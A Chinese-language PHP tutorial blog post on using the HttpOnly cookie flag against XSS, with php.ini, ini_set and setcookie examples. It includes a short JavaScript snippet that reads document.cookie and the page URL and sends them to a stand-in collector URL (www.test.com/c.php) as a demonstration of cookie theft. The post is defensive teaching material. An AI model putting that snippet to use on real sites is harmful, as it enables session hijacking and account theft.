xss防御之php利用httponly防xss攻击


Posted in PHP onMarch 21, 2014

xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。

如下js获取cookie信息:

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly

//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过:

header("Set-Cookie: hidden=value; httpOnly");

最后,HttpOnly不是万能的!

PHP 相关文章推荐
PHP&MYSQL服务器配置说明
Oct 09 PHP
PHP_MySQL教程-第一天
Mar 18 PHP
PHP写入WRITE编码为UTF8的文件的实现代码
Jul 07 PHP
PHP var_dump遍历对象属性的函数与应用代码
Jun 04 PHP
PHP中将ip地址转成十进制数的两种实用方法
Aug 15 PHP
php使用fsockopen函数发送post,get请求获取网页内容的方法
Nov 15 PHP
Yii获取当前url和域名的方法
Jun 08 PHP
LINUX下PHP程序实现WORD文件转化为PDF文件的方法
May 13 PHP
基于php编程规范(详解)
Aug 17 PHP
浅谈PHPANALYSIS提取关键字
Mar 08 PHP
ThinkPHP类似AOP思想的参数验证的实现方法
Dec 18 PHP
PHP程序员必须知道的两种日志实例分析
May 14 PHP
php5.3 goto函数介绍和示例
Mar 21 #PHP
php ctype函数中文翻译和示例
Mar 21 #PHP
php的declare控制符和ticks教程(附示例)
Mar 21 #PHP
php像数组一样存取和修改字符串字符
Mar 21 #PHP
easyui的tabs update正确用法分享
Mar 21 #PHP
php设置session值和cookies的学习示例
Mar 21 #PHP
一个显示效果非常不错的PHP错误、异常处理类
Mar 21 #PHP
You might like
PHP 分页原理分析,大家可以看看
2009/12/21 PHP
PHP对象转换为数组函数(递归方法)
2012/02/04 PHP
PHP计算指定日期所在周的开始和结束日期的方法
2015/03/24 PHP
php文件下载处理方法分析
2015/04/22 PHP
php等比例缩放图片及剪切图片代码分享
2016/02/13 PHP
php解析mht文件转换成html的实例
2017/03/13 PHP
jquery tablesorter.js 支持中文表格排序改进
2009/12/09 Javascript
Javascript 实现TreeView CheckBox全选效果
2010/01/11 Javascript
IE之动态添加DOM节点触发window.resize事件
2010/07/27 Javascript
精通Javascript系列之数值计算
2011/06/07 Javascript
使用jQuery和PHP实现类似360功能开关效果
2014/02/12 Javascript
JavaScript中利用jQuery绑定事件的几种方式小结
2016/03/06 Javascript
总结几道关于Node.js的面试问题
2017/01/11 Javascript
jquery点赞功能实现代码 点个赞吧!
2020/05/29 jQuery
Vue.js仿微信聊天窗口展示组件功能
2017/08/11 Javascript
浅谈Node模块系统及其模式
2017/11/17 Javascript
详解小程序用户登录状态检查与更新实例
2019/05/15 Javascript
Vue-CLI 项目在pycharm中配置方法
2019/08/30 Javascript
Node.js学习教程之Module模块
2019/09/03 Javascript
numpy中loadtxt 的用法详解
2018/08/03 Python
Python线程之定位与销毁的实现
2019/02/17 Python
django框架auth模块用法实例详解
2019/12/10 Python
安装pyinstaller遇到的各种问题(小结)
2020/11/20 Python
天猫精选:上天猫,就够了
2016/09/21 全球购物
Camille Jewelry官网:现代女性时尚首饰
2019/07/07 全球购物
什么是Linux虚拟文件系统VFS
2015/08/25 面试题
信息工程学院毕业生推荐信
2013/11/05 职场文书
岗位职责定义及内容
2013/11/08 职场文书
机械电子工程毕业生自荐信
2013/11/23 职场文书
自我鉴定书
2014/03/24 职场文书
摄影展策划方案
2014/06/02 职场文书
企业法人代表证明书
2014/09/27 职场文书
幼儿园小班个人工作总结
2015/02/12 职场文书
2015年度优秀员工自荐书
2015/03/06 职场文书
2015年政教主任工作总结
2015/07/23 职场文书
七年级生物教学反思
2016/02/20 职场文书